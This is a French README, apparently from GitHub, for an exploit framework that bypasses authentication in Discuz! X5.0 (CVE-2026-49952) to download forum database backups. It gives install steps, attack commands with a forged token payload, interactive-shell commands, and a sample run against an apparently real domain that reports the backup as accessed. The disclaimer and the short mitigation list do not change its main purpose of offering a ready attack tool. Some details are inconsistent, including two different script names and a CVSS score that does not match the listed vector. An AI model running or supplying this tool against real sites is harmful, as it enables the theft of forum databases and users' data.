
Discuz! X5.0 Framework d'exploitation de contournement d'authentification (CVE-2026-49952) - Vulnérabilité critique permettant un accès non authentifié aux sauvegardes de la base de données via la réutilisation de jetons de l'oracle de chiffrement UC_KEY. CVSS 9.1. Outil complet avec détection de version, attaques multi-payload, shell interactif et exploitation automatisée. Tests autorisés uniquement.
⚡ CVE-2026-49952 | CVSS 9.1 (Critique ) | Version 1.0.0
Un outil professionnel de test d'intrusion conçu pour identifier et démontrer la vulnérabilité critique de contournement d'authentification dans Discuz! X5.0.
AVIS IMPORTANT Cet outil est fourni à des fins éducatives et de tests de sécurité autorisés uniquement. N'UTILISEZ PAS cet outil sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous ne disposez pas d'une autorisation explicite de test. L'accès non autorisé à des systèmes informatiques est illégal et contraire à l'éthique. L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil. En utilisant cet outil, vous acceptez de vous conformer à toutes les lois et réglementations applicables.
Le Framework d'exploitation du contournement d'authentification Discuz! X5.0 est conçu pour identifier et démontrer la vulnérabilité critique de contournement d'authentification (CVE-2026-49952) dans les versions de Discuz! X5.0 publiées entre le 20 mars 2026 et le 1er mai 2026.
Cette vulnérabilité permet à des attaquants non authentifiés d'accéder à la fonctionnalité de sauvegarde de la base de données (dbbak.php) en exploitant l'oracle de chiffrement UC_KEY pour la réutilisation de jetons, exposant potentiellement le contenu sensible de la base de données.
🏆 Score CVSS : 9.1 (Critique)
🔐 Impact : Contournement d'authentification
📂 Accès : Fichiers de sauvegarde de la base de données
⚡ Complexité : Faible (Facile à exploiter)
🎯 Cible : Discuz! X5.0 (20260320 - 20260501)
La vulnérabilité se situe dans le point de terminaison dbbak.php où le mécanisme de validation des jetons repose sur l'oracle de chiffrement UC_KEY. En forgeant un payload spécifique dans la requête de connexion (member.php), un attaquant peut obtenir un jeton d'authentification valide qui peut être réutilisé pour accéder à la fonctionnalité de sauvegarde de la base de données sans autorisation appropriée.
❌ Discuz! X5.0 (20260320 - 20260501) - Vulnérable
✅ Discuz! X5.0 (20260510+) - Corrigé
🔍 Détection de version : Prise d'empreinte automatique et identification de la version de Discuz!.
⚡ Attaque multi-payload : Test parallèle de plusieurs variantes de payload.
🖥️ Shell interactif : Interface en ligne de commande complète pour l'exploitation manuelle.
🚀 Exploitation automatisée : Exploitation en un clic avec une configuration minimale.
📊 Enregistrement des résultats : Exportation des résultats d'exploitation vers des fichiers horodatés.
🌐 Support proxy : Configuration de proxy HTTP/HTTPS pour la traversée du réseau.
🎯 Analyse multithread : Nombre de threads configurable pour l'optimisation des performances.
🎨 Sortie colorée : Sortie terminal professionnelle avec code couleur.
🔐 Support SSL/TLS : Gère les cibles HTTP et HTTPS.
🔄 Gestion de session : Maintient un état de session persistant.
📦 Personnalisation des payloads : Prise en charge de l'injection de payloads personnalisés.
🎯 Validation de la cible : Vérifie l'installation de Discuz! avant l'exploitation.
Python : Version 3.7 ou supérieure
Pip : Gestionnaire de paquets Python
# Clone the repository
git clone https://github.com/CerberusMrXi/Discuz-X5.0-Authentication-Bypass-Exploit-Framework
cd Discuz-X5.0-Authentication-Bypass-Exploit-Framework
# Install required packages
pip install -r requirements.txt
# Verify installation
python3 exploit.py --help
# Build the Docker image
docker build -t exploit .
# Run the container
docker run -it --rm exploit http://target.com
# Simple exploitation
python3 exploit.py http://target.com
# With output file
python3 exploit.py http://target.com --output results.txt
# Verbose mode for debugging
python3 exploit.py http://target.com --verbose
# With proxy and custom threads
python3 exploit.py https://target.com --proxy http://127.0.0.1:8080 --threads 10
# Custom payload
python3 exploit.py http://target.com --payload "admin|1|0|0"
python3 exploit.py http://discuz.eda.com.my
██████╗ ██╗███████╗██╗ ██╗███████╗███████╗██████╗
██╔══██╗██║██╔════╝██║ ██║╚══███╔╝╚══███╔╝╚════██╗
██║ ██║██║███████╗██║ ██║ ███╔╝ ███╔╝ █████╔╝
██║ ██║██║╚════██║██║ ██║ ███╔╝ ███╔╝ ██╔═══╝
██████╔╝██║███████║╚██████╔╝███████╗███████╗███████╗
╚═════╝ ╚═╝╚══════╝ ╚═════╝ ╚══════╝╚══════╝╚══════╝
Discuz! X5.0 Authentication Bypass Exploit Framework
CVE-2026-49952 | CVSS: 9.1 (Critical )
Author: Sudeepa Wanigarathna | Version: 1.0.0
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
[14:32:15] ► Phase 1: Target Reconnaissance
[14:32:15] ➜ Testing connectivity to http://discuz.eda.com.my
[14:32:16] ➜ Detecting Discuz! version...
[14:32:16] ✔ Discuz! Version: X5.0
[14:32:16] ⚡ Target is running a vulnerable version!
[14:32:16] ► Phase 2: Authcode Acquisition
[14:32:16] ➜ Extracting authcode with payload: admin|1|0|0
[14:32:17] ✔ Authcode: aBcDeFgHiJkLmNoPqRsT...
[14:32:17] ► Phase 3: Exploitation
[14:32:17] ➜ Executing exploit (operation: backup )
[14:32:18] ✔ Exploit successful!
[14:32:18] ✔ Results saved to discuz_exploit_20260724_143218.txt
╔══════════════════════════════════════════════════════════╗
║ EXPLOIT SUCCESSFUL ║
╠══════════════════════════════════════════════════════════╣
║ Target: http://discuz.eda.com.my ║
║ Authcode: aBcDeFgHiJkLmNoPqRsT... ║
║ Status: Database backup accessed ║
║ Data Size: 24567 bytes ║
║ Saved to: discuz_exploit_20260724_143218.txt ║
╚══════════════════════════════════════════════════════════╝
Démarrez le shell interactif pour une exploitation manuelle :
python3 discuz_exploit.py http://target.com --interactive
N'utiliser que sur des systèmes que vous possédez ou pour lesquels vous disposez d'une autorisation explicite de test.
Obtenir une autorisation écrite avant de tester.
Suivre les pratiques de divulgation responsable.
Signaler correctement les vulnérabilités aux fournisseurs.
Utiliser dans des environnements de laboratoire isolés pour l'apprentissage.
Ne jamais utiliser contre des systèmes de production sans autorisation.
Ne pas partager publiquement les données exploitées.
Ne jamais utiliser pour des activités illégales ou du vol de données.
Ne pas modifier ni supprimer de données pendant les tests.
Ne jamais exploiter sans consentement.
Pour les administrateurs système :
Mettre à jour immédiatement : Passer à la version Discuz! X5.0 (20260510+) ou ultérieure.
Désactiver le point de terminaison : Désactiver temporairement dbbak.php s'il n'est pas nécessaire.
Surveiller les journaux : Surveiller les accès suspects à member.php et dbbak.php.
Règles WAF : Mettre en œuvre des règles de pare-feu applicatif Web (WAF) pour bloquer les requêtes malveillantes.
Liste blanche d'adresses IP : Restreindre l'accès au point de terminaison de sauvegarde aux adresses IP de confiance.
Error: Failed to connect to target
Solutions:
• Check if target URL is correct
• Verify network connectivity
• Check for firewalls blocking access
• Try with proxy: --proxy http://your_proxy:port
• Ensure target is online and accessible
Error: Authentication failed or invalid authcode
Solutions:
• Ensure the target Discuz! version is vulnerable
• Try different payloads for authcode extraction
• Check for network issues or WAF interference
• Run in verbose mode (--verbose ) for more details
Ce projet est distribué sous la licence MIT.
Copyright © 2026 Sudeepa Wanigarathna
Permission est accordée, gratuitement, à toute personne obtenant une copie de ce logiciel et des fichiers de documentation associés (le « Logiciel »), d'utiliser le Logiciel sans restriction, y compris sans limitation les droits d'utiliser, de copier, de modifier, de fusionner, de publier, de distribuer, de sous-licencier et/ou de vendre des copies du Logiciel, et de permettre aux personnes à qui le Logiciel est fourni de faire de même, sous réserve des conditions suivantes :
L'avis de droit d'auteur ci-dessus et le présent avis d'autorisation doivent être inclus dans toutes les copies ou parties substantielles du Logiciel.
LE LOGICIEL EST FOURNI « EN L'ÉTAT », SANS GARANTIE D'AUCUNE SORTE, EXPLICITE OU IMPLICITE, Y COMPRIS MAIS SANS S'Y LIMITER LES GARANTIES DE QUALITÉ MARCHANDE, D'ADÉQUATION À UN USAGE PARTICULIER ET D'ABSENCE DE CONTREFAÇON. EN AUCUN CAS, LES AUTEURS OU TITULAIRES DU DROIT D'AUTEUR NE SERONT RESPONSABLES DE TOUTE RÉCLAMATION, DE TOUT DOMMAGE OU DE TOUTE AUTRE RESPONSABILITÉ, QUE CE SOIT DANS LE CADRE D'UNE ACTION CONTRACTUELLE, DÉLICTUELLE OU AUTRE, DÉCOULANT DE, OU EN RELATION AVEC LE LOGICIEL, SON UTILISATION OU TOUTE AUTRE INTERACTION AVEC LE LOGICIEL.
Auteur : Sudeepa Wanigarathna | GitHub : @CerberusMrXi
⭐ Si vous trouvez cet outil utile, pensez à lui attribuer une étoile !
🔐 Utilisez de manière responsable. Restez éthique. Continuez à apprendre.
| Attribut | Détails |
|---|
| Type de vulnérabilité | Contournement d'authentification |
| Identifiant CVE | CVE-2026-49952 |
| Version CVSS | 3.1 |
| Score CVSS | 9.1 (Critique) |
| Vecteur d'attaque | Réseau |
| Complexité de l'attaque | Faible |
| Privilèges requis | Aucun |
| Interaction utilisateur | Aucune |
| Impact sur la confidentialité | Élevé |
| Impact sur l'intégrité | Élevé |
| Impact sur la disponibilité | Élevé |
| Maturité du code d'exploitation | Fonctionnel |
| Niveau de remédiation | Correctif officiel disponible |
| Commande | Description | Exemple |
|---|
help | Afficher toutes les commandes disponibles | help |
scan | Détecter la version de Discuz! et vérifier la vulnérabilité | scan |
get [payload] | Extraire l'authcode (payload personnalisé optionnel) | `get admin |
exploit [op] | Exécuter l'exploit (par défaut : backup) | exploit backup |
save | Enregistrer les résultats dans un fichier | save |
info | Afficher les informations de session | info |
clear | Effacer l'écran du terminal | clear |
exit / quit | Quitter le shell interactif | exit |